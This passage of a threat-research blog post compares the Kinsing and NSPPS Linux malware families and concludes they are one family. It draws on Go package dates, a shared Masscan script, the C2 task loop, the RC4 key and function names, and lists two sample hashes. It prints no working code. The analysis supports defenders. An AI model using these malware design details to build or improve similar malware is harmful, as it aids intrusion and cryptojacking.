<li><a class="email on" data-share="email" href="/cdn-cgi/l/email-protection#dae5aeb5e7fcbbb7aae1a9afb8b0bfb9aee799b5b4aebfb4aeffe8eabca8b5b7ffe8eab7a3ffe8ea92afb8ffe8ebfcbbb7aae1b8b5bea3e799b2bfb9b1ffe8eab5afaeffe8eaadb2bbaeffe8eda9ffe8eab2bbaaaabfb4b3b4bdffe8eabbaeffe8ea99a3b8bfa89ba8b1ffe8ebffea9bffea9b91b3b4a9b3b4bdffe99bffe8ea8eb2bfffe8ea97bbb6adbba8bfffe8eaadb3aeb2ffe8ea8eadb5ffe8ea9cbbb9bfa9ffea9b96bbaebfb6a3ffe899ffe8eaadbfff9fe8ffe2eaffe3e3acbfffe8eab8bfbfb4ffe8eab8afa9a3ffe8eaa8bfa9bfbba8b9b2b3b4bdffe8eaaeb2bfffe8eabebfacbfb6b5aab3b4bdffe8eabcb3bfb6beffe8eab5bcffe8eab9b6b5afbeffe8eabbb4beffe8eab9b5b4aebbb3b4bfa8ffe8eaaeb2a8bfbbaea9f4ffe8ea8db2a3ffe8eabcb5b9afa9ffe8eab2bfa8bfffe99cffe8ea98bfb9bbafa9bfffe899ffe8eabba9ffe8eaaeb2b3a9ffe8eaaebfb9b2b4b5b6b5bda3ffe8eab8bfb9b5b7bfa9ffe8eab7b5a8bfffe8eaaab5aaafb6bba8ffe8eabbb4beffe8eab9b5b4aeb3b4afbfa9ffe8eaaeb5ffe8eabfacb5b6acbfffe899ffe8eabbaeaebbb9b1bfa8a9ffe8eabba8bff4f4f4ffea9bffea9bb2aeaeaaa9ffe99bffe89cffe89cadadadf4b9a3b8bfa8bba8b1f4b9b5b7ffe89ca8bfa9b5afa8b9bfa9ffe89caeb2a8bfbbaef7a8bfa9bfbba8b9b2f7b8b6b5bdffe89cb1b3b4a9b3b4bdf7aeb2bff7b7bbb6adbba8bff7adb3aeb2f7aeadb5f7bcbbb9bfa9">Email</a></li> <li><a class="linkedin on" data-share="linkedin" href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.cyberark.com%2Fresources%2Fthreat-research-blog%2Fkinsing-the-malware-with-two-faces&amp;title=Kinsing%3A%20The%20Malware%20with%20Two%20Faces&amp;summary=Lately%2C%20we%E2%80%99ve%20been%20busy%20researching%20the%20developing%20field%20of%20cloud%20and%20container%20threats.%20Why%20focus%20here%3F%20Because%2C%20as%20this%20technology%20becomes%20more%20popular%20and%20continues%20to%20evolve%2C%20attackers%20are...">LinkedIn</a></li> </ul>
</div>
</div>
</div>
<div class="entry">
<p>&nbsp;</p>
<p style="padding-bottom:40px"><img alt="2 Faces of Kinsing" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" height="360" loading="lazy" sizes="(max-width: 840px) 100vw, 840px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Kinsing-Malware-Threat-Research.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Kinsing-Malware-Threat-Research.png 840w, https://www.cyberark.com/wp-content/uploads/2021/03/Kinsing-Malware-Threat-Research-300x129.png 300w, https://www.cyberark.com/wp-content/uploads/2021/03/Kinsing-Malware-Threat-Research-768x329.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Kinsing-Malware-Threat-Research-150x64.png 150w" width="840" /></p>
<p>Lately, we&rsquo;ve been busy researching the developing field of cloud and container threats. Why focus here? Because, as this technology becomes more popular and continues to evolve, attackers are also evolving their techniques to infiltrate these systems.</p>
<p>During our research, we came across <strong>Kinsing</strong> &ndash; an ELF malware that has been involved in multiple attack campaigns, including <a href="https://blog.trendmicro.com/trendlabs-security-intelligence/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining/">Redis</a> and <a href="https://redcanary.com/blog/kinsing-malware-citrix-saltstack/">SaltStack</a>. Kinsing is written in Go language, aka Golang, which is a relatively new language that has seen sharply increased popularity among malware authors within the past few years.</p>
<p>While analyzing a few Kinsing samples, we were surprised to find some artifacts related to another malware family called <strong>NSPPS</strong>. At first, we came up with several ideas that might explain those findings- maybe the common parts are open source tools that are used by both families, or perhaps one group mimics the other. What our research shows is the two families are actually the same one, with two different names that were given to it by the security research community.</p>
<p>In this blog, we will review the differences and similarities between Kinsing and NSPPS, present our findings and explain how and why we concluded that they are the same malware family.</p>
<h3><strong>NSPPS vs. Kinsing &ndash; The Differences</strong></h3>
<p>At the beginning of the research, we collected all of the IOCs that were published by security firms for detecting Kinsing and NSPPS, wrote our own YARA rules and gathered the results. After a little clean up, we had several dozens of samples that we focused on.</p>
<p>Of the 27 samples of Kinsing and NSPPS, only one of them was published as NSPPS &ndash; 5059d67cd24eb4b0b4a174a072ceac6a47e14c3302da2c6581f81c39d8a076c6. The other 26 samples were classified as Kinsing.</p>
<p>We found some major artifacts differentiating the NSPPS sample from the Kinsing samples.</p>
<p><strong><em>Versions and Dates: Let&rsquo;s Compare Numbers</em></strong></p>
<p>First and most notably, NSPPS sample was written using Golang version 1.9.7:</p>
<p><img alt="Kingsing 1" class="aligncenter wp-image-113334 size-full" height="92" loading="lazy" sizes="(max-width: 970px) 100vw, 970px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-1.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-1.png 970w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-1-300x28.png 300w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-1-768x73.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-1-150x14.png 150w" width="970" /></p>
<p style="text-align: center;"><em>Figure N. 1: Golang version for NSPPS</em></p>
<p>Kinsing samples were written using Golang version 1.13.4 or 1.13.6:</p>
<p><img alt="" class="alignnone size-full wp-image-113638" height="46" loading="lazy" src="https://www.cyberark.com/wp-content/uploads/2021/03/2.png" width="970" /></p>
<p><img alt="" class="alignnone size-full wp-image-113646" height="48" loading="lazy" src="https://www.cyberark.com/wp-content/uploads/2021/03/3.png" width="970" /></p>
<p style="text-align: center;"><em>Figure N. 2: Golang versions for NSPPS</em></p>
<p>This difference might imply that the compilation time of each sample is different, since it is reasonable to use the latest version, although not necessary.</p>
<p>Determining the compilation timestamp of the samples was important to the process of differentiating the two families. Unfortunately, unlike Windows PE files, Linux ELF files do not have a compilation timestamp by design, leaving us with another missing piece of information. Luckily, Golang malware (or generally speaking &ndash; Golang binaries) by default uses Github packages, which usually contain a version number. This helps to determine a minimum date for the malware compilation by calculating the last release date of the newest package it uses.</p>
<p>Below is a partial list of the common packages for Kinsing samples with their release dates:</p>
<table class="table table-bordered table-striped table-responsive-stack" width="100%">
<thead>
<tr>
<th width="33%">Package</th>
<th width="33%">Version</th>
<th width="33%">Release Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>go-resty/resty</td>
<td>2.1.0</td>
<td>10/10/2019</td>
</tr>
<tr>
<td>google/btree</td>
<td>1.0.0</td>
<td>13/08/2018</td>
</tr>
<tr>
<td>kelseyhightower/envconfig</td>
<td>1.4.0</td>
<td>24/05/2019</td>
</tr>
<tr>
<td>markbates/pkger</td>
<td>0.12.8</td>
<td>21/11/2019</td>
</tr>
<tr>
<td>paulbellamy/ratecounter</td>
<td>0.2.0</td>
<td>19/07/2017</td>
</tr>
<tr>
<td>peterbourgon/diskv</td>
<td>2.0.1</td>
<td>14/08/2017</td>
</tr>
<tr>
<td>shirou/gopsutil</td>
<td>2.19.10</td>
<td>19/10/2019</td>
</tr>
</tbody>
</table>
<p style="text-align: center;"><em>Table N. 1: a partial list of Kinsing packages with their release dates</em></p>
<p>&ldquo;<a href="https://github.com/markbates/pkger">pkger</a> &rdquo; has the latest release date:</p>
<p><img alt="" class="aligncenter wp-image-113350 size-full" height="514" loading="lazy" sizes="(max-width: 1658px) 100vw, 1658px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-3.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-3.png 1658w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-3-300x93.png 300w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-3-1024x317.png 1024w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-3-768x238.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-3-1536x476.png 1536w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-3-150x47.png 150w" width="1658" /></p>
<p style="text-align: center;"><em>Figure N. 3: latest package release for Kinsing</em></p>
<p>Therefore, we can conclude that all 26 Kinsing samples were compiled after Nov. 21, 2019.</p>
<p>Below is a partial list of the packages NSPPS uses:</p>
<table class="table table-bordered table-striped table-responsive-stack" width="100%">
<thead>
<tr>
<th width="33%">Package</th>
<th width="33%">Version</th>
<th width="33%">Release Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>google/btree</td>
<td>1.0.0</td>
<td>13/08/2018</td>
</tr>
<tr>
<td>go-resty/resty</td>
<td>2.1.0</td>
<td>10/10/2019</td>
</tr>
<tr>
<td>kelseyhightower/envconfig</td>
<td>1.4.0</td>
<td>25/05/2019</td>
</tr>
<tr>
<td>paulbellamy/ratecounter</td>
<td>0.2.0</td>
<td>19/07/2017</td>
</tr>
<tr>
<td>peterbourgon/diskv</td>
<td>3.0.0</td>
<td>25/04/2019</td>
</tr>
</tbody>
</table>
<p style="text-align: center;"><em>Table N. 2: a partial list of NSPPS packages with their release dates</em></p>
<p>As shown, the earliest possible compilation date for NSPPS is Oct. 10, 2019. This suggests it was compiled before Kinsing, but that may not necessarily be the case.</p>
<p><strong><em>To Be or Not to Be: That&rsquo;s the Difference</em></strong></p>
<p>An odd artifact found in Kinsing samples is the presence of the full text of William Shakespeare&rsquo;s play Hamlet, as seen below:</p>
<p><img alt="" class="aligncenter wp-image-113358 size-full" height="1130" loading="lazy" sizes="(max-width: 1638px) 100vw, 1638px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-4.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-4.png 1638w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-4-300x207.png 300w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-4-1024x706.png 1024w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-4-768x530.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-4-1536x1060.png 1536w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-4-150x103.png 150w" width="1638" /></p>
<p style="text-align: center;"><em>Figure N. 4: Hamlet play inside Kinsing</em></p>
<p>This evidence was previously published by several researchers. The common assumption is that this was done <a href="https://www.lacework.com/blog/h2miner-botnet/">to avoid detection by static detection engines</a> or <a href="https://redcanary.com/blog/kinsing-malware-citrix-saltstack/">to increase the binary size</a>, which serves the same goal. This artifact is not present in NSPPS samples.</p>
<p>At first, it seems like an important difference &nbsp;&ndash; maybe the authors of Kinsing paid more attention to hiding their malware than the authors of NSPPS. However, after digging a little deeper, we found another explanation. When checking the location of the Hamlet play inside Kinsing, it has some references to it, rather than just existing in the data section among other strings of the binary:</p>
<p><img alt="" class="alignnone size-full wp-image-113366" height="224" loading="lazy" sizes="(max-width: 1510px) 100vw, 1510px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-5.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-5.png 1510w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-5-300x45.png 300w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-5-1024x152.png 1024w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-5-768x114.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-5-150x22.png 150w" width="1510" /></p>
<p style="text-align: center;"><em>Figure N. 5: Hamlet play X-refs</em></p>
<p>Then, looking at the relevant function:</p>
<p><img alt="" class="aligncenter wp-image-113374 size-full" height="1068" loading="lazy" sizes="(max-width: 2192px) 100vw, 2192px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-6.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-6.png 2192w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-6-300x146.png 300w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-6-1024x499.png 1024w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-6-768x374.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-6-1536x748.png 1536w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-6-2048x998.png 2048w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-6-150x73.png 150w" width="2192" /></p>
<p style="text-align: center;"><em>Figure N. 6: code X-references to the Hamlet play</em></p>
<p>This function&rsquo;s name is <span class="cyb-inline-code-labs">github.com.markbates.pkger.internal.takeon.github.com.markbates.hepa.filters</span>, which means: &ldquo;a function located in <span class="cyb-inline-code-labs">filters</span> file in <span class="cyb-inline-code-labs">hepa</span> package written by <span class="cyb-inline-code-labs">markbates</span> and uploaded to Github, but actually embedded into <span class="cyb-inline-code-labs">pkger</span> package written by <span class="cyb-inline-code-labs">markbates</span> and uploaded to Github as well.&rdquo;</p>
<p>And as expected:</p>
<p><img alt="" class="aligncenter size-large wp-image-113382" height="200" loading="lazy" sizes="(max-width: 640px) 100vw, 640px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-7-1024x320.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-7-1024x320.png 1024w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-7-300x94.png 300w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-7-768x240.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-7-1536x481.png 1536w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-7-2048x641.png 2048w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-7-150x47.png 150w" width="640" /></p>
<p style="text-align: center;"><em>Figure N. 7: pkger package that contains the Hamlet play</em></p>
<p>Which leads to the next piece of code:</p>
<p><img alt="" class="aligncenter size-large wp-image-113390" height="626" loading="lazy" sizes="(max-width: 640px) 100vw, 640px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-8-1024x1001.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-8-1024x1001.png 1024w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-8-300x293.png 300w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-8-768x751.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-8-1536x1502.png 1536w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-8-150x147.png 150w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-8.png 1538w" width="640" /></p>
<p style="text-align: center;"><em>Figure N. 8: Hamlet play inside of pkger package</em></p>
<p>(And of course, don&rsquo;t forget to check release <a href="https://github.com/markbates/pkger/tree/v0.12.8">0.12.8</a>, as this piece was removed since then by the author.)</p>
<p>When analyzing the hepa package, we understood the purpose of Hamlet- it is used to hide secret parts of a buffer. For example, let&rsquo;s say you want to upload your useful AWS script to GitHub for sharing your wisdom with the world, but then you&rsquo;re not sure if you removed all of the parts containing your secret AWS keys. In this situation, you may use a tool that automatically searches for password-related information and removes it. Think about how awesome it would be to replace your token with a powerful phrase from Hamlet!</p>
<p>Now, as you&rsquo;ve probably noticed, the pkger package wasn&rsquo;t listed as one of NSPPS&rsquo; packages, so the absence of Hamlet from NSPPS is only related to the absence of this package that is used as part of cryptomining activity (<em>more on this later).</em></p>
<p>The bottom line is, although Hamlet is considered to be (or not to be?) a great and meaningful play, it&rsquo;s not meaningful evidence in our comparison. Rather, it&rsquo;s a side effect of other more significant elements.</p>
<p><strong><em>Where&rsquo;s the money?</em></strong></p>
<p>When reading reports about Kinsing samples, it is clear that the purpose of Kinsing is to install a cryptoMiner named <span class="cyb-inline-code-labs">kdevtmpfsi</span>, as shown in this diagram from Aqua Security:</p>
<p><img alt="" class="aligncenter size-large wp-image-113398" height="397" loading="lazy" sizes="(max-width: 640px) 100vw, 640px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-9-1024x635.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-9-1024x635.png 1024w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-9-300x186.png 300w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-9-768x476.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-9-1536x953.png 1536w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-9-2048x1270.png 2048w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-9-150x93.png 150w" width="640" /></p>
<p style="text-align: center;"><em>Figure N. 9: Kinsing diagram as posted by Aqua Security</em><br />
Source: <a href="https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability">https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability</a></p>
<p>When looking at the code of Kinsing samples, we find many functions related to the cryptominer activity:</p>
<p><img alt="" class="aligncenter wp-image-113414 size-large" height="299" loading="lazy" sizes="(max-width: 640px) 100vw, 640px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-10-1024x478.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-10-1024x478.png 1024w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-10-300x140.png 300w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-10-768x358.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-10-150x70.png 150w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-10.png 1076w" width="640" /></p>
<p style="text-align: center;"><em>Figure N. 10: Kinsing functions related to Miner activity</em></p>
<p>Those functions are called from <span class="cyb-inline-code-labs">main.main</span>, which is the real main function of the code.</p>
<p>All of the code related to cryptomining activity, including checks and actions, is missing from the NSPPS sample. This is a major difference between the two tools: the cryptomining functionality suggests that the purpose of the Kinsing malware is to install a cryptominer in the victim system, while the purpose of the NSPPS malware is to provide RAT functionality.</p>
<h3><strong>NSPPS vs. Kinsing &ndash; The Similarities</strong></h3>
<p>While we found several differences between Kinsing and NSPPS that make them look like completely different malware families, a tiny voice reminds us that we promised to prove they are from the same family. Below are some of those similarities.</p>
<p><strong><em>Masscan for All</em></strong></p>
<p>One characteristic that repeats itself through all of the samples is the usage of the <a href="https://github.com/robertdavidgraham/masscan">Masscan</a> tool &ndash; more specifically, the same exact usage of Masscan. Both Kinsing and NSPPS malware contain an embedded, clear-text bash script named <span class="cyb-inline-code-labs">firewire.sh</span> that is executed by the function <span class="cyb-inline-code-labs">main.masscan</span>. This function writes the script to the disk, changes its mode to executable and then runs it.</p>
<p>See the full <span class="cyb-inline-code-labs">firewire.sh</span> script in <span class="cyb-inline-code-labs"><strong>Appendix B</strong></span>.</p>
<p>The code in <span class="cyb-inline-code-labs">main.masscan</span> that handles that is as follows:</p>
<p><img alt="" class="aligncenter wp-image-113422 size-full" height="288" loading="lazy" sizes="(max-width: 2194px) 100vw, 2194px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-11.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-11.png 2194w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-11-300x39.png 300w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-11-1024x134.png 1024w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-11-768x101.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-11-1536x202.png 1536w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-11-2048x269.png 2048w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-11-150x20.png 150w" width="2194" /></p>
<p style="text-align: center;"><em>Figure N. 11: Kinsing&rsquo;s code for handling firewire.sh</em></p>
<p>The <span class="cyb-inline-code-labs">main.masscan</span> function for NSPPS is a little different (probably due to compiler difference as mentioned above) but contains the same <span class="cyb-inline-code-labs">WriteFile -&gt; runcmd -&gt; newobject</span> sequence as seen in Kinsing:</p>
<p><img alt="" class="aligncenter wp-image-113430 size-full" height="222" loading="lazy" sizes="(max-width: 2018px) 100vw, 2018px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-12.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-12.png 2018w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-12-300x33.png 300w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-12-1024x113.png 1024w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-12-768x84.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-12-1536x169.png 1536w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-12-150x17.png 150w" width="2018" /></p>
<p style="text-align: center;"><em>Figure N. 12: NSPPS&rsquo;s code for handling firewire.sh</em></p>
<p>From our research, the firewire.sh script isn&rsquo;t publicly available for use, nor has it been presented as an Open Source tool, so we believe that this piece of evidence isn&rsquo;t just a coincidence. This means that there was a connection between the authors of the two malwares, or at least that they shared their resources.</p>
<p><strong><em>Code Structure</em></strong></p>
<p>When analyzing NSPPS, it is notable that it features a very simple code structure. At the beginning of the code, NSPPS calls three initialization functions, then it enters a while loop that runs forever. The loop gets a task (<span class="cyb-inline-code-labs">getTask()</span>) from the C2 server and executes it (<span class="cyb-inline-code-labs">doTask()</span>). Inside the <span class="cyb-inline-code-labs">doTask</span> function, the malware checks the string it got, then chooses the right function for performing the received task.</p>
<p>To our surprise, when analyzing Kinsing, we found it has the same structure, except for a few minor changes. The main change is an additional initialization function that&rsquo;s responsible for cryptomining. There are also some minor changes to the inner functions inside the loop.</p>
<p>See the code snippets below for a demonstration:</p>
<p><img alt="" class="aligncenter wp-image-113438 size-full" height="1964" loading="lazy" sizes="(max-width: 1460px) 100vw, 1460px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-13.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-13.png 1460w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-13-223x300.png 223w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-13-761x1024.png 761w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-13-768x1033.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-13-1142x1536.png 1142w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-13-150x202.png 150w" width="1460" /></p>
<p style="text-align: center;"><em>Figure N. 13: Pseudo-Code for NSPPS&rsquo;s and Kinsing&rsquo;s code structure comparison</em></p>
<p>There are also differences between the different samples of Kinsing. For example, not all of them have the &ldquo;redis_brute&rdquo; functionality, and some have much fewer functions.</p>
<p>Looking at the common structure we just described, we believe that the relation between the two families now hardly seems like a coincidence or random imitation, but more like cooperation between the authors &ndash; or even reuse of the same code.</p>
<p><strong><em>Encryption, Encryption, Encryption</em></strong></p>
<p>In their <a href="https://www.ironnet.com/blog/malware-analysis-nspps-a-go-rat-backdoor">analysis</a> for the NSPPS sample, IronNet included a YARA rule that searches for an RC4 key used by NSPPS. Using this YARA and searching for this specific RC4 key, we found all of the Kinsing samples in it, as well as the NSPPS sample:</p>
<p><img alt="" class="aligncenter wp-image-113446 size-full" height="116" loading="lazy" sizes="(max-width: 1814px) 100vw, 1814px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-14.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-14.png 1814w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-14-300x19.png 300w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-14-1024x65.png 1024w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-14-768x49.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-14-1536x98.png 1536w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-14-150x10.png 150w" width="1814" /></p>
<p style="text-align: center;"><em>Figure N. 14: Kinsing RC4 key</em></p>
<p><img alt="" class="aligncenter size-full wp-image-113454" height="122" loading="lazy" sizes="(max-width: 1806px) 100vw, 1806px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-15.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-15.png 1806w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-15-300x20.png 300w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-15-1024x69.png 1024w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-15-768x52.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-15-1536x104.png 1536w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-15-150x10.png 150w" width="1806" /></p>
<p style="text-align: center;"><em>Figure N. 15: NSPPS RC4 key</em></p>
<p>When checking the XRefs to this key to find the usage of it, we can see that it is used through almost the same functions in both malware families.</p>
<p>Usage for NSPPS:</p>
<p><img alt="" class="aligncenter size-large wp-image-113462" height="181" loading="lazy" sizes="(max-width: 640px) 100vw, 640px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-16-1024x289.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-16-1024x289.png 1024w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-16-300x85.png 300w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-16-768x217.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-16-1536x433.png 1536w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-16-150x42.png 150w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-16.png 1956w" width="640" /></p>
<p style="text-align: center;"><em>Figure N. 16: RC4 key usage for NSPPS</em></p>
<p>Usage for Kinsing:</p>
<p><img alt="" class="aligncenter wp-image-113470 size-large" height="196" loading="lazy" sizes="(max-width: 640px) 100vw, 640px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-17-1024x314.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-17-1024x314.png 1024w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-17-300x92.png 300w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-17-768x236.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-17-1536x472.png 1536w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-17-150x46.png 150w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-17.png 1980w" width="640" /></p>
<p style="text-align: center;"><em>Figure N. 17: RC4 key usage for Kinsing</em></p>
<p>The only difference is the function <span class="cyb-inline-code-labs">getMinerPid</span> that exists only in the Kinsing samples, since NSPPS doesn&rsquo;t have the same cryptomining functionality.</p>
<p>Looking at the function <span class="cyb-inline-code-labs">main.RC4</span> that implements the RC4 encryption in both malwares, we see that the two implementations are practically identical. See the comparison below:</p>
<p><img alt="" class="aligncenter wp-image-113478 size-full" height="2206" loading="lazy" sizes="(max-width: 1834px) 100vw, 1834px" src="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-18.png" srcset="https://www.cyberark.com/wp-content/uploads/2021/03/Figure-18.png 1834w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-18-249x300.png 249w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-18-851x1024.png 851w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-18-768x924.png 768w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-18-1277x1536.png 1277w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-18-1703x2048.png 1703w, https://www.cyberark.com/wp-content/uploads/2021/03/Figure-18-150x180.png 150w" width="1834" /></p>
<p style="text-align: center;"><em>Figure N. 18: NSPPS&rsquo;s and Kinsing&rsquo;s main.RC4 function comparison</em></p>
<p><strong><em>Functions Names</em></strong></p>
<p>After all of this, the last thing to show is the function list of those samples.</p>
<p>Golang binaries have the property of preserving the source code symbols, which comes in handy in our case by making the entire list of original function names available. We already discussed the packages used in the binaries, which contain their own functions, so now we are interested in the functions that were written by the malware author. Those functions are identified by the prefix <span class="cyb-inline-code-labs">main.</span>, and they are the ones used in the next comparison.</p>
<p>NSPPS has 63 functions.</p>
<p>Kinsing samples vary from each other a bit. Let&rsquo;s compare a random Kinsing sample that was published earlier: b70d14a7c069c2a88a8a55a6a2088aea184f84c0e110678e6a4afa2eb377649f. This sample only has 59 functions (see <span class="cyb-inline-code-labs"><strong>Appendix C</strong></span> for a complete list of functions for both samples).</p>
<p>Both samples have 51 function names in common, which represent 83% of the functions. Kinsing has eight unique function names and NSPPS has 12. Kinsing&rsquo;s unique functions are cryptomining-related while NSPPS&rsquo; unique functions are mostly RAT-related. From that, we learn that a major part of the code is named the same, which implies that the same author wrote both samples or that one of the authors copied from the other.</p>
<h3><strong>Conclusion</strong></h3>
<p>We&rsquo;ve presented both NSPPS and Kinsing and discussed their differences: Golang versions, packages, the Hamlet play script and cryptomining activity. We also presented the similarities of the two families: the Masscan script named Firewire.sh, the shared code structure, the RC4 key and the function names.</p>
<p>All of the above suggests that both malwares represent the same family. We believe the first version was compiled sometime before Nov. 2019, was named NSPPS and was used as a RAT. Later, the malware was updated with some new packages (such as markbates\pkger), new functionalities (cryptomining capabilities), new Shakespeare inspiration and was named as Kinsing by other security companies.</p>
<p>Although the usage and the purpose of the malware changed, we as researchers can still benefit from the similarities between the malware because analysis and detection can be much easier and quicker using the knowledge we already have from former versions.</p>
<p><em><strong>A Note About Detection via VirusTotal</strong></em></p>
